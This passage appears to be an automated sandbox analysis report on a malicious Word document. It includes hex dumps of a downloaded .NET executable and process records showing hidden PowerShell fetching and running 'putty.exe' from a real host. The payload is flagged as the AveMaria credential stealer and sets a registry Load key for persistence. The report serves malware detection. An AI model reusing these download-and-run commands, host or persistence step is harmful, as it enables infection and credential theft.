                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 31 9b 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 2e 14 00 00 da 00 00 00 00 00 00 06 4c 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 4b 14 00 4f 00 00 00 00 60 14 00 20 d6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 15 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 2c 14 00 00 20 00 00 00 2e 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 d6 00 00 00 60 14 00 00 d8 00 00 00 30 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 08 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 4b 14 00 00 00 00 00 48 00 00 00 02 00 05 00 90 30 01 00 64 ab 02 00 03 00 00 00 73 01 00 06 f4 db 03 00 c0 6f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1d 00 00 0a 2a 26 00 02 28 1e 00 00 0a 00 2a ce 73 1f 00 00 0a 80 01 00 00 04 73 20 00 00 0a 80 02 00 00 04 73 21 00 00 0a 80 03 00 00 04 73 22 00 00 0a 80 04 00 00 04 73 23 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 24 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 31 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 37 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 3f 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 45 00 00 70 7e 07 00 00 04 6f 2d 00
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL1aP.L `@ `@KO` @ H.text, . `.rsrc `0@@.reloc@@BKH0dso(*&(*ss s!s"s#*0~o$+*0~o%+*0~o&+*0~o'+*0~o(+*0<~(),!rp(*o+s,~+*0~+*"*0&(r1p~o-(.t$+*0&(r7p~o-(.t$+*0&(r?p~o-(.t$+*0&(rEp~o-
                                Aug 2, 2021 11:00:29.667186975 CEST2384INData Raw: 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 4d 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08
                                Data Ascii: (.t$+*0&(rMp~o-(.t$+*0&(r[p~o-(.t$+*0&(rkp~o-(.t$+*0&(r{p~o-(.t$+*0&(
                                Aug 2, 2021 11:00:29.667202950 CEST2385INData Raw: 06 72 8d 01 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 99 01 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b
                                Data Ascii: rp~o-(.t$+*0&(rp~o-(.t$+*0&(rp~o-(.t$+*0&(rp~o-(.t$+*0&(rp~o-(.t$+*
                                Aug 2, 2021 11:00:29.667218924 CEST2387INData Raw: 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 25 03 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 2d 03 00 70 7e 07 00 00 04 6f 2d 00 00 0a
                                Data Ascii: &(r%p~o-(.t$+*0&(r-p~o-(.t$+*0&(r7p~o-(.t$+*0&(rCp~o-(.t$+*0&(rOp~o-(.
                                Aug 2, 2021 11:00:29.697216034 CEST2388INData Raw: 7b 14 00 00 04 16 fe 01 02 7b 13 00 00 04 16 fe 01 60 0b 07 2c 04 17 0a 2b 34 02 7b 14 00 00 04 02 7b 13 00 00 04 d6 1f 40 fe 01 0c 08 2c 04 17 0a 2b 1b 02 17 28 51 00 00 06 02 18 28 51 00 00 06 5f 0d 09 2c 04 17 0a 2b 04 16 0a 2b 00 06 2a 00 00
                                Data Ascii: {{`,+4{{@,+(Q(Q_,++*0"@"@{k{k(5{{s6(7{s8""{k{ks5o9(:"@s;{{s<o
                                Aug 2, 2021 11:00:29.697247028 CEST2390INData Raw: 06 72 67 18 00 70 28 52 00 00 0a 0a 06 72 f0 18 00 70 28 52 00 00 0a 0a 06 72 79 19 00 70 28 52 00 00 0a 0a 06 72 02 1a 00 70 28 52 00 00 0a 0a 06 72 8b 1a 00 70 28 52 00 00 0a 0a 06 72 14 1b 00 70 28 52 00 00 0a 0a 06 72 9d 1b 00 70 28 52 00 00
                                Data Ascii: rgp(Rrp(Rryp(Rrp(Rrp(Rrp(Rrp(Rr&p(Rrp(Rr8p(Rrp(RrJp(Rrp(Rr\p(Rrp(Rrn p(Rr p(Rr!p(Rr"p(Rr"p(Rr
                                Aug 2, 2021 11:00:29.697258949 CEST2391INData Raw: 28 52 00 00 0a 0a 06 72 57 54 00 70 28 52 00 00 0a 0a 06 72 e0 54 00 70 28 52 00 00 0a 0a 06 72 69 55 00 70 28 52 00 00 0a 0a 06 72 f2 55 00 70 28 52 00 00 0a 0a 06 72 7b 56 00 70 28 52 00 00 0a 0a 06 72 04 57 00 70 28 52 00 00 0a 0a 06 72 8d 57
                                Data Ascii: (RrWTp(RrTp(RriUp(RrUp(Rr{Vp(RrWp(RrWp(RrXp(RrXp(Rr(Yp(RrYp(Rr:Zp(RrZp(RrL[p(Rr[p(Rr^\p(Rr\p(Rrp]p(Rr]p(Rr^p(R
                                Aug 2, 2021 11:00:29.697280884 CEST2392INData Raw: 06 72 be 8f 00 70 28 52 00 00 0a 0a 06 72 47 90 00 70 28 52 00 00 0a 0a 06 72 d0 90 00 70 28 52 00 00 0a 0a 06 72 59 91 00 70 28 52 00 00 0a 0a 06 72 e2 91 00 70 28 52 00 00 0a 0a 06 72 6b 92 00 70 28 52 00 00 0a 0a 06 72 f4 92 00 70 28 52 00 00
                                Data Ascii: rp(RrGp(Rrp(RrYp(Rrp(Rrkp(Rrp(Rr}p(Rrp(Rrp(Rrp(Rrp(Rr*p(Rrp(Rr<p(Rrp(RrNp(Rrp(Rr`p(Rrp(Rrr
                                Aug 2, 2021 11:00:29.697299004 CEST2394INData Raw: 28 52 00 00 0a 0a 06 72 ae cb 00 70 28 52 00 00 0a 0a 06 72 37 cc 00 70 28 52 00 00 0a 0a 06 72 c0 cc 00 70 28 52 00 00 0a 0a 06 72 49 cd 00 70 28 52 00 00 0a 0a 06 72 d2 cd 00 70 28 52 00 00 0a 0a 06 72 5b ce 00 70 28 52 00 00 0a 0a 06 72 e4 ce
                                Data Ascii: (Rrp(Rr7p(Rrp(RrIp(Rrp(Rr[p(Rrp(Rrmp(Rrp(Rrp(Rrp(Rrp(Rrp(Rrp(Rr,p(Rrp(Rr>p(Rrp(RrPp(Rrp(R
                                Aug 2, 2021 11:00:29.697319031 CEST2395INData Raw: 06 72 15 07 01 70 28 52 00 00 0a 0a 06 72 9e 07 01 70 28 52 00 00 0a 0a 06 72 27 08 01 70 28 52 00 00 0a 0a 06 72 b0 08 01 70 28 52 00 00 0a 0a 06 72 39 09 01 70 28 52 00 00 0a 0a 06 72 c2 09 01 70 28 52 00 00 0a 0a 06 72 4b 0a 01 70 28 52 00 00
                                Data Ascii: rp(Rrp(Rr'p(Rrp(Rr9p(Rrp(RrKp(Rrp(Rr]p(Rrp(Rrop(Rrp(Rrp(Rrp(Rrp(Rrp(Rrp(Rr.p(Rrp(Rr@p(Rr
                                Aug 2, 2021 11:00:29.697339058 CEST2396INData Raw: 28 52 00 00 0a 0a 06 72 7c 42 01 70 28 52 00 00 0a 0a 06 72 05 43 01 70 28 52 00 00 0a 0a 06 72 8e 43 01 70 28 52 00 00 0a 0a 06 72 17 44 01 70 28 52 00 00 0a 0a 06 72 a0 44 01 70 28 52 00 00 0a 0a 06 72 29 45 01 70 28 52 00 00 0a 0a 06 72 b2 45
                                Data Ascii: (Rr|Bp(RrCp(RrCp(RrDp(RrDp(Rr)Ep(RrEp(Rr;Fp(RrFp(RrMGp(RrGp(Rr_Hp(RrHp(RrqIp(RrIp(RrJp(RrKp(RrKp(RrLp(RrLp(R


                                Code Manipulations

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                Analysis Process: WINWORD.EXE PID: 2604 Parent PID: 584

                                General

                                Start time:10:59:37
                                Start date:02/08/2021
                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                Wow64 process (32bit):false
                                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                Imagebase:0x13f7d0000
                                File size:1424032 bytes
                                MD5 hash:95C38D04597050285A18F66039EDB456
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: powershell.exe PID: 2396 Parent PID: 2604

                                General

                                Start time:10:59:40
                                Start date:02/08/2021
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
                                Imagebase:0x13f100000
                                File size:473600 bytes
                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000003.00000002.2094462607.0000000000160000.00000004.00000020.sdmp, Author: Florian Roth
                                Reputation:high

                                Chronological Activities

                                Analysis Process: FLTLDR.EXE PID: 3048 Parent PID: 2604

                                General

                                Start time:10:59:40
                                Start date:02/08/2021
                                Path:C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE
                                Wow64 process (32bit):false
                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
                                Imagebase:0x13f870000
                                File size:157024 bytes
                                MD5 hash:AF5CCD95BAC7ADADD56DE185D7461B2C
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Chronological Activities

                                Analysis Process: powershell.exe PID: 1068 Parent PID: 2604

                                General

                                Start time:10:59:41
                                Start date:02/08/2021
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
                                Imagebase:0x13f100000
                                File size:473600 bytes
                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000006.00000002.2096261364.00000000002C0000.00000004.00000020.sdmp, Author: Florian Roth
                                Reputation:high

                                Chronological Activities

                                Analysis Process: powershell.exe PID: 3056 Parent PID: 2604

                                General

                                Start time:10:59:41
                                Start date:02/08/2021
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
                                Imagebase:0x13f100000
                                File size:473600 bytes
                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Reputation:high

                                Chronological Activities

                                Analysis Process: putty.exe PID: 2952 Parent PID: 1068

                                General

                                Start time:10:59:44
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\AppData\Roaming\putty.exe'
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 28%, ReversingLabs
                                Reputation:low

                                Chronological Activities

                                Analysis Process: putty.exe PID: 2948 Parent PID: 3056

                                General

                                Start time:10:59:44
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\AppData\Roaming\putty.exe'
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                Chronological Activities

                                Analysis Process: putty.exe PID: 1492 Parent PID: 2948

                                General

                                Start time:10:59:51
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Users\user\AppData\Roaming\putty.exe
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low

                                Chronological Activities

                                Analysis Process: putty.exe PID: 2308 Parent PID: 2952

                                General

                                Start time:10:59:52
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\putty.exe
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: AveMaria_WarZone, Description: unknown, Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                Chronological Activities

                                Analysis Process: putty.exe PID: 2260 Parent PID: 2948

                                General

                                Start time:10:59:52
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Users\user\AppData\Roaming\putty.exe
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low

                                Chronological Activities

                                Analysis Process: putty.exe PID: 2428 Parent PID: 2948

                                General

                                Start time:10:59:54
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\putty.exe
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: AveMaria_WarZone, Description: unknown, Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                Reputation:low

                                Chronological Activities

                                Analysis Process: cmd.exe PID: 2156 Parent PID: 2308

                                General

                                Start time:10:59:56
                                Start date:02/08/2021
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
                                Imagebase:0x49d30000
                                File size:302592 bytes
                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: images.exe PID: 2168 Parent PID: 2308

                                General

                                Start time:10:59:56
                                Start date:02/08/2021
                                Path:C:\ProgramData\images.exe
                                Wow64 process (32bit):true
                                Commandline:C:\ProgramData\images.exe
                                Imagebase:0x1180000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 28%, ReversingLabs

                                Chronological Activities

                                Analysis Process: reg.exe PID: 2400 Parent PID: 2156

                                General

                                Start time:10:59:57
                                Start date:02/08/2021
                                Path:C:\Windows\SysWOW64\reg.exe
                                Wow64 process (32bit):true
                                Commandline:REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
                                Imagebase:0xb50000
                                File size:62464 bytes
                                MD5 hash:D69A9ABBB0D795F21995C2F48C1EB560
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: verclsid.exe PID: 1900 Parent PID: 2604

                                General

                                Start time:11:00:00
                                Start date:02/08/2021
                                Path:C:\Windows\System32\verclsid.exe
                                Wow64 process (32bit):false
                                Commandline:'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                                Imagebase:0xff8f0000
                                File size:11776 bytes
                                MD5 hash:3796AE13F680D9239210513EDA590E86
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: images.exe PID: 2820 Parent PID: 2168

                                General

                                Start time:11:00:02
                                Start date:02/08/2021
                                Path:C:\ProgramData\images.exe
                                Wow64 process (32bit):true
                                Commandline:C:\ProgramData\images.exe
                                Imagebase:0x1180000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: AveMaria_WarZone, Description: unknown, Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, Author: Joe Security

                                Chronological Activities

                                Analysis Process: notepad.exe PID: 2416 Parent PID: 2604

                                General

